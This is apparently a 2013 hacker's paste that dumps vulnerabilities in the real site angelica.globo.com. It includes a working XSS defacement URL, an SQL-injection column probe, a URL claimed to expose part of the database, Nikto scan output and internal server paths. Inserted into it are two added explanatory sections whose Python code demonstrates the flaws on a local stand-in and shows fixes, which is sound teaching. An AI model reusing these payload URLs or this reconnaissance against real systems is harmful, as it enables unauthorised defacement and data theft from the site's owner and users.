supermanavc

angelica.globo.com

Apr 15th, 2013
ANGELICA.GLOBO.COM - SUP3RM4N
---------------------------------------------------------------------------
+ Target IP: 201.7.176.72
+ Target Hostname: angelica.globo.com
+ Target Port: 80
+ Start Time: 2013-04-15 21:56:57 (GMT-3)
---------------------------------------------------------------------------
XSS: http://angelica.globo.com/galeriaFotosPessoal.php?dir='%22--%3E%3E%22%3E%3Cmarquee%3E%3Ccenter%3E%3Ch1%3EHacked+By+Superman%20%3C/h1%3E%3Cimg+src%3Dhttp://linux.meuhobby.com/themes/galeriatux/Supermantux.png%3E%3C/marquee%3E&pageLabelBoost=

Programming Error Message: http://angelica.globo.com/galeriaFotosPessoal.php?dir=27%20order%20by%205--

APACHE LEAK: http://angelica.globo.com/icons/README

Allows downloading part of the db: http://angelica.globo.com/galeriaFotosPessoal.php/cab/angelica.ico
http://angelica.globo.com/galeriaFotosPessoal.php/vgn/login/1,501,,00.html?cookieName=x--\

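The two `galeriaFotosPessoal.php?dir=` probes above, replayed against a stand-in for that page. This is an added example, not code from the paste or from globo.com: the real PHP source is not shown, so the `galerias` table, its three columns, and the "look the gallery up by id, then echo the parameter" behaviour are assumptions. It shows why `order by 5--` produces the "Programming Error Message" (the error fires only once the ORDER BY index exceeds the real column count, which is exactly what the probe is measuring) and why the XSS payload lands, next to the parameterised and output-encoded versions.

```python
"""Replays the paste's two galeriaFotosPessoal.php?dir= probes against a stand-in
for that PHP page. Added example, not code from the paste or from globo.com: the
real page's source is not on the page, so the 'galerias' table, its three columns
and the 'look the gallery up by id, then echo the parameter' behaviour are assumed."""
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The two probe URLs exactly as they appear in the paste.
XSS_URL = ("http://angelica.globo.com/galeriaFotosPessoal.php?dir='%22--%3E%3E%22%3E"
           "%3Cmarquee%3E%3Ccenter%3E%3Ch1%3EHacked+By+Superman%20%3C/h1%3E"
           "%3Cimg+src%3Dhttp://linux.meuhobby.com/themes/galeriatux/Supermantux.png%3E"
           "%3C/marquee%3E&pageLabelBoost=")
SQLI_URL = "http://angelica.globo.com/galeriaFotosPessoal.php?dir=27%20order%20by%205--"


def dir_param(url):
    """Decode the `dir` query parameter the way PHP's $_GET['dir'] would see it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["dir"][0]


def sample_db():
    """Constructed in-memory stand-in for the gallery table (assumed schema, sample rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE galerias (id INTEGER PRIMARY KEY, dir TEXT, titulo TEXT)")
    conn.executemany("INSERT INTO galerias VALUES (?, ?, ?)",
                     [(27, "2013/04", "Bastidores"), (28, "2013/03", "Viagem")])
    return conn


def lookup_vulnerable(conn, dir_value):
    """Interpolates the parameter straight into SQL. Returns (rows, error_message)."""
    sql = f"SELECT id, dir, titulo FROM galerias WHERE id = {dir_value}"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        # A verbose database error like this is the 'Programming Error Message' the
        # paste refers to: ORDER BY n only fails once n exceeds the column count, so
        # the attacker learns how many columns a later UNION SELECT must supply.
        return None, str(exc)


def lookup_safe(conn, dir_value):
    """Validates the type, then binds the value; nothing from the URL reaches the SQL parser."""
    try:
        gallery_id = int(dir_value)
    except ValueError:
        return None, "invalid gallery id"
    rows = conn.execute("SELECT id, dir, titulo FROM galerias WHERE id = ?",
                        (gallery_id,)).fetchall()
    return rows, None


def render_vulnerable(dir_value):
    """Echoes the parameter into HTML unchanged, which is what the XSS PoC demonstrates."""
    return f"<p>Galeria: {dir_value}</p>"


def render_safe(dir_value):
    """Same template with output encoding (PHP equivalent: htmlspecialchars($dir, ENT_QUOTES))."""
    return f"<p>Galeria: {html.escape(dir_value, quote=True)}</p>"


def reflected_unescaped(page, value):
    """True when the raw input, tags and all, survives into the response verbatim."""
    return value in page


if __name__ == "__main__":
    conn = sample_db()
    probe = dir_param(SQLI_URL)
    print("vulnerable, ORDER BY 5:", lookup_vulnerable(conn, probe))
    print("vulnerable, ORDER BY 3:", lookup_vulnerable(conn, "27 order by 3--"))
    print("safe:", lookup_safe(conn, probe))
    payload = dir_param(XSS_URL)
    print("reflected raw:", reflected_unescaped(render_vulnerable(payload), payload))
    print("reflected escaped:", reflected_unescaped(render_safe(payload), payload))
```

Run it and the interpolated query with `order by 5--` fails with an out-of-range ORDER BY error while `order by 3--` succeeds, which is the column-count oracle the probe relies on; the bound query rejects the input before SQL is involved. The encoded template turns `<marquee>` into `&lt;marquee&gt;`, so the payload no longer appears verbatim in the page. The same two fixes apply in PHP: cast or validate `$_GET['dir']` and use a prepared statement, and wrap every echo of it in `htmlspecialchars()`.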
+ Server: No banner retrieved
+ Server leaks inodes via ETags, header found with file /, inode: 6023887, size: 235, mtime: 0x4fe09989
+ The anti-clickjacking X-Frame-Options header is not present.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ HTTP method ('Allow' Header): 'CONNECT' may allow server to proxy client requests.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed as allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3233: /icons/README: Apache default file found.

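The header findings above come from a single response, so they can be re-derived without Nikto. The script below is an added example, not part of the paste or of Nikto: the response it parses is constructed, with the Allow list and the ETag assembled from the values the scan reported (the server's actual bytes are not on the page). It decodes Apache's default `inode-size-mtime` ETag back into the inode, file size and modification time the scan printed, and flags the unsafe methods, WebDAV, TRACE and the missing X-Frame-Options header.

```python
"""Re-derives the paste's Nikto header findings from one raw HTTP response.
Added example, not from the paste or from Nikto. RESPONSE is constructed: the
Allow list and the ETag are built from the values the scan reported."""
from datetime import datetime, timezone

# Apache's default FileETag is "inode-size-mtime" in hex, so the reported
# inode 6023887, size 235 and mtime 0x4fe09989 become "5beacf-eb-4fe09989".
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    'ETag: "5beacf-eb-4fe09989"\r\n'
    "Allow: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, "
    "PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK\r\n"
    "Content-Length: 235\r\n"
    "\r\n"
)

UNSAFE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "CONNECT", "TRACE", "PATCH"}
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}


def parse_headers(raw):
    """Header block -> dict with lower-cased names (repeated headers are joined)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
    return headers


def decode_apache_etag(etag):
    """Split an Apache FileETag into (inode, size, mtime as UTC datetime).
    Apache 1.3 stored mtime in seconds; 2.x stores apr_time_t microseconds, so
    values too large to be seconds are scaled down. Returns None for other formats."""
    value = etag.strip()
    if value.startswith("W/"):
        value = value[2:]
    parts = value.strip('"').split("-")
    if len(parts) != 3:
        return None
    try:
        inode, size, mtime = (int(p, 16) for p in parts)
    except ValueError:
        return None
    if mtime > 10**11:
        mtime //= 1_000_000
    return inode, size, datetime.fromtimestamp(mtime, tz=timezone.utc)


def allowed_methods(headers):
    """Methods the server advertises in its Allow header (a claim, not yet a proof)."""
    return {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}


def audit(raw):
    """Produce the same findings Nikto printed, from the headers alone."""
    headers = parse_headers(raw)
    methods = allowed_methods(headers)
    return {
        "unsafe_methods": sorted(methods & UNSAFE_METHODS),
        "webdav": bool(methods & WEBDAV_METHODS),
        "trace_enabled": "TRACE" in methods,
        "clickjacking_header_missing": (
            "x-frame-options" not in headers
            and "frame-ancestors" not in headers.get("content-security-policy", "")
        ),
        "etag_leak": decode_apache_etag(headers["etag"]) if "etag" in headers else None,
    }


if __name__ == "__main__":
    for name, finding in audit(RESPONSE).items():
        print(f"{name}: {finding}")
```

Two caveats a practitioner would apply before reporting these as Nikto does: an Allow header is what the server says, not what it does, so PUT and DELETE need a confirming request against a path you are authorised to touch (and WebDAV may still be behind authentication), and XST via TRACE only matters if a client can issue cross-origin TRACE, which modern browsers refuse. On the Apache side the fixes are configuration: `TraceEnable Off`, `FileETag MTime Size` to drop the inode, a `<LimitExcept GET POST HEAD>` block that denies the rest, and `Header always set X-Frame-Options SAMEORIGIN`.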
Internal Path Disclosure:
/mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/legendas.txt
/mnt/filer/httpd-clientes/parceiros/angelica/www/revistas-capas.php
/mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/titulos.txt
/mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/legendas.txt
/mnt/filer/httpd-clientes/parceiros/angelica/www/galeriaFotosEstrelas.php
/mnt/filer/httpd-clientes/parceiros/angelica/wwwtexto/titulos.txt

+ /galeriaFotosPessoal.php/: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/1Jy5CGSq.dat: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/1Jy5CGSq.conf: PHP include error reveals the full path to the web root.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /galeriaFotosPessoal.php/clientaccesspolicy.xml: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/robots.txt: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/~root: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/hp/device/this.LCDispatcher: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/hmstat.htm: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/SoundBridgeStatus.html: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/eng/start/StatPtrGen.htm: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/cab/top.shtml: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/home.asp: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/favicon.ico: PHP include error reveals the full path to the web root.
+ /galeriaFotosPessoal.php/index.asp: PHP include error reveals the full path to the web root.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

#SUP3RM4N